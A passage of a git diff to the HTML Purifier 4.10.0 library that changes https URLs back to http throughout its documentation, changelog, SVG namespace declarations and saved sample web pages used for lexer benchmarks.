http://www.gnu.org/software/global/global.html). You # will need version 4.8.6 or higher. USE_HTAGS = NO @@ -1149,7 +1149,7 @@ PERL_PATH = /usr/bin/perl CLASS_DIAGRAMS = YES # You can define message sequence charts within doxygen comments using the \msc -# command. Doxygen will then run the mscgen tool (see https://www.mcternan.me.uk/mscgen/) to +# command. Doxygen will then run the mscgen tool (see http://www.mcternan.me.uk/mscgen/) to # produce the chart and insert it in the documentation. The MSCGEN_PATH tag allows you to # specify the directory where the mscgen tool resides. If left empty the tool is assumed to # be found in the default search path. diff --git a/htmlpurifier-4.10.0/INSTALL b/htmlpurifier-4.10.0/INSTALL index 8f32219..e77b516 100755 --- a/htmlpurifier-4.10.0/INSTALL +++ b/htmlpurifier-4.10.0/INSTALL @@ -59,7 +59,7 @@ codebase. If you don't know what doctype you are using, you can determine the doctype from this identifier at the top of your source code: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> ...and the character encoding from this code: @@ -67,7 +67,7 @@ the doctype from this identifier at the top of your source code: If the character encoding declaration is missing, STOP NOW, and read 'docs/enduser-utf8.html' (web accessible at -https://htmlpurifier.org/docs/enduser-utf8.html). In fact, even if it is +http://htmlpurifier.org/docs/enduser-utf8.html). In fact, even if it is present, read this document anyway, as many websites specify their document's character encoding incorrectly. @@ -234,7 +234,7 @@ However, switching to UTF-8 is not always immediately feasible, so we can adapt. HTML Purifier uses iconv to support other character encodings, as such, -any encoding that iconv supports <https://www.gnu.org/software/libiconv/> +any encoding that iconv supports <http://www.gnu.org/software/libiconv/> HTML Purifier supports with this code: $config->set('Core.Encoding', /* put your encoding here */); @@ -271,10 +271,10 @@ Other supported doctypes include: 4.3. Other settings There are more configuration directives which can be read about -here: <https://htmlpurifier.org/live/configdoc/plain.html> They're a bit boring, +here: <http://htmlpurifier.org/live/configdoc/plain.html> They're a bit boring, but they can help out for those of you who like to exert maximum control over your code. Some of the more interesting ones are configurable at the -demo <https://htmlpurifier.org/demo.php> and are well worth looking into +demo <http://htmlpurifier.org/demo.php> and are well worth looking into for your own system. For example, you can fine tune allowed elements and attributes, convert @@ -288,7 +288,7 @@ translates to: E.g. $config->set('HTML.Allowed', 'p,b,a[href],i'); - $config->set('URI.Base', 'https://www.example.com'); + $config->set('URI.Base', 'http://www.example.com'); $config->set('URI.MakeAbsolute', true); $config->set('AutoFormat.AutoParagraph', true); diff --git a/htmlpurifier-4.10.0/NEWS b/htmlpurifier-4.10.0/NEWS index 32774c5..647e4f7 100755 --- a/htmlpurifier-4.10.0/NEWS +++ b/htmlpurifier-4.10.0/NEWS @@ -213,7 +213,7 @@ real release we decided to skip this version number. 4.3.0, released 2011-03-27 # Fixed broken caching of customized raw definitions, but requires an API change. The old API still works but will emit a warning, - see https://htmlpurifier.org/docs/enduser-customize.html#optimized + see http://htmlpurifier.org/docs/enduser-customize.html#optimized for how to upgrade your code. # Protect against Internet Explorer innerHTML behavior by specially treating attributes with backticks but no angled brackets, quotes or @@ -347,7 +347,7 @@ real release we decided to skip this version number. - Fix bug where URIDefinition would not get cleared if it's directives got changed. - Fix fatal error in HTMLPurifier_Encoder on certain platforms (probably NetBSD 5.0) -- Fix bug in Linkify autoformatter involving <a><span>https://foo</span></a> +- Fix bug in Linkify autoformatter involving <a><span>http://foo</span></a> - Make %URI.Munge not apply to links that have the same host as your host. - Prevent stray </body> tag from truncating output, if a second </body> is present. @@ -681,7 +681,7 @@ real release we decided to skip this version number. ! DefinitionCacheFactory now can register new implementations ! New HTMLPurifier_Filter_ExtractStyleBlocks for extracting <style> from documents and cleaning their contents up. Requires the CSSTidy library - <https://csstidy.sourceforge.net/>. You can access the blocks with the + <http://csstidy.sourceforge.net/>. You can access the blocks with the 'StyleBlocks' Context variable ($purifier->context->get('StyleBlocks')). The output CSS can also be "scoped" for a specific element, use: %Filter.ExtractStyleBlocksScope @@ -1041,7 +1041,7 @@ real release we decided to skip this version number. - Replaced version check with functionality check for DOM (thanks Stephen Khoo) . Added smoketest 'all.php', which loads all other smoketests via frames -. Implemented AttrDef_CSSURI for url(https://google.com) style declarations +. Implemented AttrDef_CSSURI for url(http://google.com) style declarations . Added convenient single test selector form on test runner 1.3.2, released 2006-12-25 @@ -1103,7 +1103,7 @@ real release we decided to skip this version number. + %Attr.IDPrefixLocal - Same as above, but for when there are multiple instances of user content on the page + Profuse documentation on how to use these available in docs/enduser-id.txt -! Added MODx plugin <https://modxcms.com/forums/index.php/topic,6604.0.html> +! Added MODx plugin <http://modxcms.com/forums/index.php/topic,6604.0.html> ! Added percent encoding normalization ! XSS attacks smoketest given facelift ! Configuration documentation now has table of contents diff --git a/htmlpurifier-4.10.0/README.md b/htmlpurifier-4.10.0/README.md index b88df01..2270ddd 100755 --- a/htmlpurifier-4.10.0/README.md +++ b/htmlpurifier-4.10.0/README.md @@ -1,4 +1,4 @@ -HTML Purifier [](https://travis-ci.org/ezyang/htmlpurifier) +HTML Purifier [](http://travis-ci.org/ezyang/htmlpurifier) ============= HTML Purifier is an HTML filtering solution that uses a unique combination @@ -18,7 +18,7 @@ Places to go: an in-depth installation guide. * See WYSIWYG for information on editors like TinyMCE and FCKeditor -HTML Purifier can be found on the web at: [https://htmlpurifier.org/](https://htmlpurifier.org/) +HTML Purifier can be found on the web at: [http://htmlpurifier.org/](http://htmlpurifier.org/) ## Installation diff --git a/htmlpurifier-4.10.0/TODO b/htmlpurifier-4.10.0/TODO index 11ed2fa..841a1e4 100755 --- a/htmlpurifier-4.10.0/TODO +++ b/htmlpurifier-4.10.0/TODO @@ -13,7 +13,7 @@ afraid to cast your vote for the next feature to be implemented! Things to do as soon as possible: - - https://htmlpurifier.org/phorum/read.php?3,5560,6307#msg-6307 + - http://htmlpurifier.org/phorum/read.php?3,5560,6307#msg-6307 - Think about allowing explicit order of operations hooks for transforms - Fix "<.<" bug (trailing < is removed if not EOD) - Build in better internal state dumps and debugging tools for remote @@ -27,7 +27,7 @@ Things to do as soon as possible: problem is what to do when a module "supersedes" another (see also tables and basic tables.) This is a little dicier because HTML.SafeObject has some extra functionality that - trusted might find useful. See https://htmlpurifier.org/phorum/read.php?3,5762,6100 + trusted might find useful. See http://htmlpurifier.org/phorum/read.php?3,5762,6100 FUTURE VERSIONS --------------- @@ -88,7 +88,7 @@ Ongoing AutoFormat - Smileys - Syntax highlighting (with GeSHi) with <pre> and possibly <?php - - Look at https://drupal.org/project/Modules/category/63 for ideas + - Look at http://drupal.org/project/Modules/category/63 for ideas Neat feature related ! Support exporting configuration, so users can easily tweak settings diff --git a/htmlpurifier-4.10.0/art/icon-16x16.svg b/htmlpurifier-4.10.0/art/icon-16x16.svg index 3b18c96..a08024d 100755 --- a/htmlpurifier-4.10.0/art/icon-16x16.svg +++ b/htmlpurifier-4.10.0/art/icon-16x16.svg @@ -1,13 +1,13 @@ <?xml version="1.0" encoding="UTF-8" standalone="no"?> -<!-- Created with Inkscape (https://www.inkscape.org/) --> +<!-- Created with Inkscape (http://www.inkscape.org/) --> <svg - xmlns:dc="https://purl.org/dc/elements/1.1/" - xmlns:cc="https://web.resource.org/cc/" - xmlns:rdf="https://www.w3.org/1999/02/22-rdf-syntax-ns#" - xmlns:svg="https://www.w3.org/2000/svg" - xmlns="https://www.w3.org/2000/svg" - xmlns:sodipodi="https://inkscape.sourceforge.net/DTD/sodipodi-0.dtd" - xmlns:inkscape="https://www.inkscape.org/namespaces/inkscape" + xmlns:dc="http://purl.org/dc/elements/1.1/" + xmlns:cc="http://web.resource.org/cc/" + xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" + xmlns:svg="http://www.w3.org/2000/svg" + xmlns="http://www.w3.org/2000/svg" + xmlns:sodipodi="http://inkscape.sourceforge.net/DTD/sodipodi-0.dtd" + xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape" width="16.000000px" height="16.000000px" id="svg2" @@ -80,7 +80,7 @@ rdf:about=""> <dc:format>image/svg+xml</dc:format> <dc:type - rdf:resource="https://purl.org/dc/dcmitype/StillImage" /> + rdf:resource="http://purl.org/dc/dcmitype/StillImage" /> </cc:Work> </rdf:RDF> </metadata> diff --git a/htmlpurifier-4.10.0/art/icon-32x32.svg b/htmlpurifier-4.10.0/art/icon-32x32.svg index 725995f..8262130 100755 --- a/htmlpurifier-4.10.0/art/icon-32x32.svg +++ b/htmlpurifier-4.10.0/art/icon-32x32.svg @@ -1,13 +1,13 @@ <?xml version="1.0" encoding="UTF-8" standalone="no"?> -<!-- Created with Inkscape (https://www.inkscape.org/) --> +<!-- Created with Inkscape (http://www.inkscape.org/) --> <svg - xmlns:dc="https://purl.org/dc/elements/1.1/" - xmlns:cc="https://web.resource.org/cc/" - xmlns:rdf="https://www.w3.org/1999/02/22-rdf-syntax-ns#" - xmlns:svg="https://www.w3.org/2000/svg" - xmlns="https://www.w3.org/2000/svg" - xmlns:sodipodi="https://inkscape.sourceforge.net/DTD/sodipodi-0.dtd" - xmlns:inkscape="https://www.inkscape.org/namespaces/inkscape" + xmlns:dc="http://purl.org/dc/elements/1.1/" + xmlns:cc="http://web.resource.org/cc/" + xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" + xmlns:svg="http://www.w3.org/2000/svg" + xmlns="http://www.w3.org/2000/svg" + xmlns:sodipodi="http://inkscape.sourceforge.net/DTD/sodipodi-0.dtd" + xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape" width="16.000000px" height="16.000000px" id="svg2" @@ -80,7 +80,7 @@ rdf:about=""> <dc:format>image/svg+xml</dc:format> <dc:type - rdf:resource="https://purl.org/dc/dcmitype/StillImage" /> + rdf:resource="http://purl.org/dc/dcmitype/StillImage" /> </cc:Work> </rdf:RDF> </metadata> diff --git a/htmlpurifier-4.10.0/art/logo.svg b/htmlpurifier-4.10.0/art/logo.svg index 72a0877..b957926 100755 --- a/htmlpurifier-4.10.0/art/logo.svg +++ b/htmlpurifier-4.10.0/art/logo.svg @@ -1,14 +1,14 @@ <?xml version="1.0" encoding="UTF-8" standalone="no"?> -<!-- Created with Inkscape (https://www.inkscape.org/) --> +<!-- Created with Inkscape (http://www.inkscape.org/) --> <svg - xmlns:dc="https://purl.org/dc/elements/1.1/" - xmlns:cc="https://web.resource.org/cc/" - xmlns:rdf="https://www.w3.org/1999/02/22-rdf-syntax-ns#" - xmlns:svg="https://www.w3.org/2000/svg" - xmlns="https://www.w3.org/2000/svg" - xmlns:xlink="https://www.w3.org/1999/xlink" - xmlns:sodipodi="https://inkscape.sourceforge.net/DTD/sodipodi-0.dtd" - xmlns:inkscape="https://www.inkscape.org/namespaces/inkscape" + xmlns:dc="http://purl.org/dc/elements/1.1/" + xmlns:cc="http://web.resource.org/cc/" + xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" + xmlns:svg="http://www.w3.org/2000/svg" + xmlns="http://www.w3.org/2000/svg" + xmlns:xlink="http://www.w3.org/1999/xlink" + xmlns:sodipodi="http://inkscape.sourceforge.net/DTD/sodipodi-0.dtd" + xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape" width="82.000000mm" height="82.000000mm" id="svg2" @@ -98,7 +98,7 @@ rdf:about=""> <dc:format>image/svg+xml</dc:format> <dc:type - rdf:resource="https://purl.org/dc/dcmitype/StillImage" /> + rdf:resource="http://purl.org/dc/dcmitype/StillImage" /> </cc:Work> </rdf:RDF> </metadata> diff --git a/htmlpurifier-4.10.0/benchmarks/samples/Lexer/1.html b/htmlpurifier-4.10.0/benchmarks/samples/Lexer/1.html index 39ba9b9..9eed68a 100755 --- a/htmlpurifier-4.10.0/benchmarks/samples/Lexer/1.html +++ b/htmlpurifier-4.10.0/benchmarks/samples/Lexer/1.html @@ -1,4 +1,4 @@ -<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Main Page - Huaxia Taiji Club</title> @@ -13,9 +13,9 @@ <div id="heading"><a href="/en/Main_Page" title="English Main Page">Huaxia Taiji Club</a> <a class="heading_ch" href="/ch/Main_Page" title="中文主页">华夏太极俱乐部</a></div> <ul id="menu"> - <li><a href="/en/Main_Page" class="active">Main Page</a></li><li><a href="/en/About">About</a></li><li><a href="/en/News">News</a></li><li><a href="/en/Events">Events</a></li><li><a href="/en/Digest">Digest</a></li><li><a href="/en/Taiji_and_I">Taiji and I</a></li><li><a href="/en/Downloads">Downloads</a></li><li><a href="/en/Registration">Registration</a></li><li><a href="/en/Contact">Contact</a></li> <li><a href="https://www.taijiclub.org/gallery2/main.php">Gallery</a></li> + <li><a href="/en/Main_Page" class="active">Main Page</a></li><li><a href="/en/About">About</a></li><li><a href="/en/News">News</a></li><li><a href="/en/Events">Events</a></li><li><a href="/en/Digest">Digest</a></li><li><a href="/en/Taiji_and_I">Taiji and I</a></li><li><a href="/en/Downloads">Downloads</a></li><li><a href="/en/Registration">Registration</a></li><li><a href="/en/Contact">Contact</a></li> <li><a href="http://www.taijiclub.org/gallery2/main.php">Gallery</a></li> - <li><a href="https://www.taijiclub.org/forums/index.php">Forums</a></li> + <li><a href="http://www.taijiclub.org/forums/index.php">Forums</a></li> </ul> <div id="content"> @@ -26,10 +26,10 @@ <ul> <li>Zou Xiaojun was elected as the new club vice president </li> - <li>HX Edison Taiji Club <a href="https://www.taijiclub.org/downloads/Taiji_club_regulation_.pdf">by-law</a> effective 3/28/2006</li> + <li>HX Edison Taiji Club <a href="http://www.taijiclub.org/downloads/Taiji_club_regulation_.pdf">by-law</a> effective 3/28/2006</li> <li>A new email account for our club: HXEdisontaijiclub@yahoo.com</li> - <li>Workshop conducted by <a href="https://www.taijiclub.org/ch/Digest/LiDeyin">?????</a> Li Deyin is set on June 4, 2006 at Clarion Hotel in Edison from 9:30am-12pm; <a href="https://www.taijiclub.org/en/Registration">Registration</a></li> + <li>Workshop conducted by <a href="http://www.taijiclub.org/ch/Digest/LiDeyin">?????</a> Li Deyin is set on June 4, 2006 at Clarion Hotel in Edison from 9:30am-12pm; <a href="http://www.taijiclub.org/en/Registration">Registration</a></li> </ul> </div> @@ -46,7 +46,7 @@ <p>Check out our <a href="/gallery2/main.php">gallery</a>.</p> -<div style="text-align:center;"><a href="https://www.taijiclub.org/gallery2/v/2006/group1b.jpg.html?g2_imageViewsIndex=1"><img src="/gallery2/d/1836-2/group1b.jpg" /></a></div> +<div style="text-align:center;"><a href="http://www.taijiclub.org/gallery2/v/2006/group1b.jpg.html?g2_imageViewsIndex=1"><img src="/gallery2/d/1836-2/group1b.jpg" /></a></div> <div style="text-align:center;">Click on photo to see HR version</div></div> </body> diff --git a/htmlpurifier-4.10.0/benchmarks/samples/Lexer/2.html b/htmlpurifier-4.10.0/benchmarks/samples/Lexer/2.html index 8d26c06..f0819e3 100755 --- a/htmlpurifier-4.10.0/benchmarks/samples/Lexer/2.html +++ b/htmlpurifier-4.10.0/benchmarks/samples/Lexer/2.html @@ -10,11 +10,11 @@ function sf(){document.f.q.focus();} function rwt(el,ct,cd,sg){var e = window.encodeURIComponent ? encodeURIComponent : escape;el.href="/url?sa=t&ct="+e(ct)+"&cd="+e(cd)+"&url="+e(el.href).replace(/\+/g,"%2B")+"&ei=fHNBRJDEG4HSaLONmIoP"+sg;el.onmousedown="";return true;} // --> </script> -</head><body bgcolor=#ffffff text=#000000 link=#0000cc vlink=#551a8b alink=#ff0000 onLoad=sf() topmargin=3 marginheight=3><center><table border=0 cellspacing=0 cellpadding=0 width=100%><tr><td align=right nowrap><font size=-1><b>edwardzyang@gmail.com</b> | <a href="/url?sa=p&pref=ig&pval=2&q=https://www.google.com/ig%3Fhl%3Den" onmousedown="return rwt(this,'pro','hppphou:def','&sig2=hDbTpsWIp9YG37a23n6krQ')">Personalized Home</a> | <a href="/searchhistory/?hl=en">Search History</a> | <a href="https://www.google.com/accounts/ManageAccount">My Account</a> | <a href="https://www.google.com/accounts/Logout?continue=https://www.google.com/">Sign out</a></font></td></tr><tr height=4><td><img alt="" width=1 height=1></td></tr></table><img src="/intl/en/images/logo.gif" width=276 height=110 alt="Google"><br><br> +</head><body bgcolor=#ffffff text=#000000 link=#0000cc vlink=#551a8b alink=#ff0000 onLoad=sf() topmargin=3 marginheight=3><center><table border=0 cellspacing=0 cellpadding=0 width=100%><tr><td align=right nowrap><font size=-1><b>edwardzyang@gmail.com</b> | <a href="/url?sa=p&pref=ig&pval=2&q=http://www.google.com/ig%3Fhl%3Den" onmousedown="return rwt(this,'pro','hppphou:def','&sig2=hDbTpsWIp9YG37a23n6krQ')">Personalized Home</a> | <a href="/searchhistory/?hl=en">Search History</a> | <a href="https://www.google.com/accounts/ManageAccount">My Account</a> | <a href="http://www.google.com/accounts/Logout?continue=http://www.google.com/">Sign out</a></font></td></tr><tr height=4><td><img alt="" width=1 height=1></td></tr></table><img src="/intl/en/images/logo.gif" width=276 height=110 alt="Google"><br><br> <form action=/search name=f><script><!-- function qs(el) {if (window.RegExp && window.encodeURIComponent) {var ue=el.href;var qe=encodeURIComponent(document.f.q.value);if(ue.indexOf("q=")!=-1){el.href=ue.replace(new RegExp("q=[^&$]*"),"q="+qe);}else{el.href=ue+"&q="+qe;}}return 1;} // --> -</script><table border=0 cellspacing=0 cellpadding=4><tr><td nowrap><font size=-1><b>Web</b> <a id=1a class=q href="/imghp?hl=en&tab=wi" onClick="return qs(this);">Images</a> <a id=2a class=q href="https://groups.google.com/grphp?hl=en&tab=wg" onClick="return qs(this);">Groups</a> <a id=4a class=q href="https://news.google.com/nwshp?hl=en&tab=wn" onClick="return qs(this);">News</a> <a id=5a class=q href="https://froogle.google.com/frghp?hl=en&tab=wf" onClick="return qs(this);">Froogle</a> <a id=8a class=q href="/lochp?hl=en&tab=wl" onClick="return qs(this);">Local</a> <b><a href="/intl/en/options/" class=q>more »</a></b></font></td></tr></table><table cellspacing=0 cellpadding=0><tr><td width=25%> </td><td align=center><input type=hidden name=hl value=en><input maxlength=2048 size=55 name=q value="" title="Google Search"><br><input type=submit value="Google Search" name=btnG><input type=submit value="I'm Feeling Lucky" name=btnI></td><td valign=top nowrap width=25%><font size=-2> <a href=/advanced_search?hl=en>Advanced Search</a><br> <a href=/preferences?hl=en>Preferences</a><br> <a href=/language_tools?hl=en>Language Tools</a></font></td></tr></table></form><br><br><font size=-1><a href="/ads/">Advertising Programs</a> - <a href=/services/>Business Solutions</a> - <a href=/about.html>About Google</a></font><p><font size=-2>©2006 Google</font></p></center></body></html> +</script><table border=0 cellspacing=0 cellpadding=4><tr><td nowrap><font size=-1><b>Web</b> <a id=1a class=q href="/imghp?hl=en&tab=wi" onClick="return qs(this);">Images</a> <a id=2a class=q href="http://groups.google.com/grphp?hl=en&tab=wg" onClick="return qs(this);">Groups</a> <a id=4a class=q href="http://news.google.com/nwshp?hl=en&tab=wn" onClick="return qs(this);">News</a> <a id=5a class=q href="http://froogle.google.com/frghp?hl=en&tab=wf" onClick="return qs(this);">Froogle</a> <a id=8a class=q href="/lochp?hl=en&tab=wl" onClick="return qs(this);">Local</a> <b><a href="/intl/en/options/" class=q>more »</a></b></font></td></tr></table><table cellspacing=0 cellpadding=0><tr><td width=25%> </td><td align=center><input type=hidden name=hl value=en><input maxlength=2048 size=55 name=q value="" title="Google Search"><br><input type=submit value="Google Search" name=btnG><input type=submit value="I'm Feeling Lucky" name=btnI></td><td valign=top nowrap width=25%><font size=-2> <a href=/advanced_search?hl=en>Advanced Search</a><br> <a href=/preferences?hl=en>Preferences</a><br> <a href=/language_tools?hl=en>Language Tools</a></font></td></tr></table></form><br><br><font size=-1><a href="/ads/">Advertising Programs</a> - <a href=/services/>Business Solutions</a> - <a href=/about.html>About Google</a></font><p><font size=-2>©2006 Google</font></p></center></body></html> <!-- vim: et sw=4 sts=4 --> diff --git a/htmlpurifier-4.10.0/benchmarks/samples/Lexer/3.html b/htmlpurifier-4.10.0/benchmarks/samples/Lexer/3.html index f81efa6..bb683ce 100755 --- a/htmlpurifier-4.10.0/benchmarks/samples/Lexer/3.html +++ b/htmlpurifier-4.10.0/benchmarks/samples/Lexer/3.html @@ -7,7 +7,7 @@ <div id="tb"> <form name="lycos_search" method="get" target="_new" style="margin: 0px" - action="https://r.hotbot.com/r/memberpgs_lycos_searchbox_af/https://www.angelfire.lycos.com/cgi-bin/search/pursuit"> + action="http://r.hotbot.com/r/memberpgs_lycos_searchbox_af/http://www.angelfire.lycos.com/cgi-bin/search/pursuit"> <table id="tbtable" cellpadding="0" cellspacing="0" border="0" width="100%" style="border: 1px solid black;"> <tr style="background-color: #dcf7ff"> @@ -20,34 +20,34 @@ <td nowrap="nowrap">The Web</td> <td><input type="radio" name="cat" value="angelfire"></td> <td nowrap="nowrap">Angelfire</td> - <td nowrap="nowrap"> <img src="https://af.lygo.com/d/toolbar/planeticon.gif"></td><td nowrap="nowrap"> <a href="https://r.lycos.com/r/tlbr_planet/https://planet.lycos.com" target="_new">Planet</a></td> + <td nowrap="nowrap"> <img src="http://af.lygo.com/d/toolbar/planeticon.gif"></td><td nowrap="nowrap"> <a href="http://r.lycos.com/r/tlbr_planet/http://planet.lycos.com" target="_new">Planet</a></td> </tr> </table> - <td nowrap="nowrap"><a href="https://lt.angelfire.com/af_toolbar/edit/_h_/www.angelfire.lycos.com/build/index.tmpl" target="_top"> + <td nowrap="nowrap"><a href="http://lt.angelfire.com/af_toolbar/edit/_h_/www.angelfire.lycos.com/build/index.tmpl" target="_top"> <span id="build">Edit your Site</span></a> </td> - <td><img src="https://af.lygo.com/d/toolbar/dir.gif" alt="show site directory" border="0" height="10" hspace="3" width="8"></td> - <td nowrap="nowrap"><a href="https://lt.angelfire.com/af_toolbar/browse/_h_/www.angelfire.lycos.com/directory/index.tmpl" target="_top">Browse Sites</a> </td> - <td><a href="https://lt.angelfire.com/af_toolbar/angelfire/_h_/www.angelfire.lycos.com" target="_top"><img src="https://af.lygo.com/d/toolbar/aflogo_top.gif" alt="hosted by angelfire" border="0" height="26" width="143"></a></td> + <td><img src="http://af.lygo.com/d/toolbar/dir.gif" alt="show site directory" border="0" height="10" hspace="3" width="8"></td> + <td nowrap="nowrap"><a href="http://lt.angelfire.com/af_toolbar/browse/_h_/www.angelfire.lycos.com/directory/index.tmpl" target="_top">Browse Sites</a> </td> + <td><a href="http://lt.angelfire.com/af_toolbar/angelfire/_h_/www.angelfire.lycos.com" target="_top"><img src="http://af.lygo.com/d/toolbar/aflogo_top.gif" alt="hosted by angelfire" border="0" height="26" width="143"></a></td> </tr> <tr style="background-color: #dcf7ff"> <td nowrap="nowrap" valign="middle"> <input size="30" style="font-size: 10px; background-color: #fff;" type="text" name="query" id="searchbox"></td> - <td style="background: #fff url(https://af.lygo.com/d/toolbar/bg.gif) repeat-x; text-align: center;" colspan="3" align="center"> - <a href="https://clk.atdmt.com/VON/go/lycsnvon0710000019von/direct/01/"><img src="/sys/free_logo_xxxx_157x20.gif" height="20" width="157" border="0" alt="Vonage"></a><img src="https://view.atdmt.com/VON/view/lycsnvon0710000019von/direct/01/"></td> + <td style="background: #fff url(http://af.lygo.com/d/toolbar/bg.gif) repeat-x; text-align: center;" colspan="3" align="center"> + <a href="http://clk.atdmt.com/VON/go/lycsnvon0710000019von/direct/01/"><img src="/sys/free_logo_xxxx_157x20.gif" height="20" width="157" border="0" alt="Vonage"></a><img src="http://view.atdmt.com/VON/view/lycsnvon0710000019von/direct/01/"></td> <span style="font-size: 11px;"> <span style="color:#00f; font-weight:bold;">«</span> <span id="top100"> <a href="javascript:void top100('prev')" target="_top">Previous</a> | - <a href="https://lt.angelfire.com/af_toolbar/top100/_h_/www.angelfire.lycos.com/cgi-bin/top100/pagelist?start=1" target="_top">Top 100</a> | + <a href="http://lt.angelfire.com/af_toolbar/top100/_h_/www.angelfire.lycos.com/cgi-bin/top100/pagelist?start=1" target="_top">Top 100</a> | <a href="javascript:void top100('next')" target="_top">Next</a> </span> <span style="color: #00f; font-weight: bold;">»</span> </span> </td> - <td valign="top" style="background: #fff url(https://af.lygo.com/d/toolbar/bg.gif) repeat-x;"><a href="https://lt.angelfire.com/af_toolbar/angelfire/_h_/www.angelfire.lycos.com" target="_top"><img src="https://af.lygo.com/d/toolbar/aflogo_bot.gif" alt="hosted by angelfire" border="0" height="22" width="143"></a></td> + <td valign="top" style="background: #fff url(http://af.lygo.com/d/toolbar/bg.gif) repeat-x;"><a href="http://lt.angelfire.com/af_toolbar/angelfire/_h_/www.angelfire.lycos.com" target="_top"><img src="http://af.lygo.com/d/toolbar/aflogo_bot.gif" alt="hosted by angelfire" border="0" height="22" width="143"></a></td> </tr> </table> </form> @@ -60,7 +60,7 @@ if (objAdMgr.isSlotAvailable("leaderboard")) { } </script> <noscript> -<a href="https://network.realmedia.com/RealMedia/ads/click_nx.ads/lycosangelfire/ros/728x90/wp/ss/a/491169@Top1?x"><img border="0" src="https://network.realmedia.com/RealMedia/ads/adstream_nx.ads/lycosangelfire/ros/728x90/wp/ss/a/491169@Top1" alt="leaderboard ad" /></a> +<a href="http://network.realmedia.com/RealMedia/ads/click_nx.ads/lycosangelfire/ros/728x90/wp/ss/a/491169@Top1?x"><img border="0" src="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/lycosangelfire/ros/728x90/wp/ss/a/491169@Top1" alt="leaderboard ad" /></a> </noscript> </td></tr> @@ -112,10 +112,10 @@ if (objAdMgr.isSlotAvailable("leaderboard")) { <tr><td><font face="verdana,geneva" color="#000011" size="1">What is better, subtitled or dubbed anime?</font></td></tr> <tr><td><input type="radio" name="rd" value="1"><font face="verdana" size="2" color="#000011">Subtitled</font></td></tr> -<tr><td align="middle"><font face="verdana" size="1"><a href="https://pub.alxnet.com/poll?id=2079873&q=view">Current results</a></font></td></tr> +<tr><td align="middle"><font face="verdana" size="1"><a href="http://pub.alxnet.com/poll?id=2079873&q=view">Current results</a></font></td></tr> </table></td></tr> <tr> - <td><font face="verdana" size="1"><a href="https://www.alxnet.com/services/poll/">Free + <td><font face="verdana" size="1"><a href="http://www.alxnet.com/services/poll/">Free Web Polls</a></font></td> </tr> </table></form> diff --git a/htmlpurifier-4.10.0/benchmarks/samples/Lexer/4.html b/htmlpurifier-4.10.0/benchmarks/samples/Lexer/4.html index cc2748d..9264c5c 100755 --- a/htmlpurifier-4.10.0/benchmarks/samples/Lexer/4.html +++ b/htmlpurifier-4.10.0/benchmarks/samples/Lexer/4.html @@ -1,10 +1,10 @@ -<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="keywords" content="Tai Chi Chuan,Yang Pan-hou,Yang Chien-hou,Yang style Tai Chi Chuan,Yang Lu-ch'an,Wu/Hao style T'ai Chi Ch'uan,Wu Ch'uan-y�,Hao Wei-chen,Yang Shou-chung,Wu style T'ai Chi Ch'uan,Wu Chien-ch'�an" /> <link rel="shortcut icon" href="/favicon.ico" /> -<link rel="copyright" href="https://www.gnu.org/copyleft/fdl.html" /> +<link rel="copyright" href="http://www.gnu.org/copyleft/fdl.html" /> <title>Tai Chi Chuan - Wikipedia, the free encyclopedia</title> <style type="text/css" media="screen,projection">/*<![CDATA[*/ @import "/skins-1.5/monobook/main.css?9"; /*]]>*/</style> <link rel="stylesheet" type="text/css" media="print" href="/skins-1.5/common/commonPrint.css" /> @@ -34,7 +34,7 @@ <div id="content"> <a name="top" id="top"></a> - <div id="siteNotice"><div id="wikimania2006" style="text-align:right; font-size:80%"><a href="https://wm06reg.wikimedia.org/" class="external text" title="https://wm06reg.wikimedia.org/">Registration</a> for <a href="https://wikimania2006.wikimedia.org" class="external text" title="https://wikimania2006.wikimedia.org">Wikimania 2006</a> is open. </div> + <div id="siteNotice"><div id="wikimania2006" style="text-align:right; font-size:80%"><a href="http://wm06reg.wikimedia.org/" class="external text" title="http://wm06reg.wikimedia.org/">Registration</a> for <a href="http://wikimania2006.wikimedia.org" class="external text" title="http://wikimania2006.wikimedia.org">Wikimania 2006</a> is open. </div> </div> <h1 class="firstHeading">Tai Chi Chuan</h1> <div id="bodyContent"> <h3 id="siteSub">From Wikipedia, the free encyclopedia</h3> @@ -50,7 +50,7 @@ <div class="center"> <div class="thumb tnone"> -<div style="width:182px;"><a href="/wiki/Image:Yang_Ch%27eng-fu_circa_1918.jpg" class="internal" title="Yang Chengfu in a posture from the Tai Chi solo form known as Single Whip, circa 1918"><img src="https://upload.wikimedia.org/wikipedia/en/thumb/d/d1/Yang_Ch%27eng-fu_circa_1918.jpg/180px-Yang_Ch%27eng-fu_circa_1918.jpg" alt="Yang Chengfu in a posture from the Tai Chi solo form known as Single Whip, circa 1918" width="180" height="255" longdesc="/wiki/Image:Yang_Ch%27eng-fu_circa_1918.jpg" /></a> +<div style="width:182px;"><a href="/wiki/Image:Yang_Ch%27eng-fu_circa_1918.jpg" class="internal" title="Yang Chengfu in a posture from the Tai Chi solo form known as Single Whip, circa 1918"><img 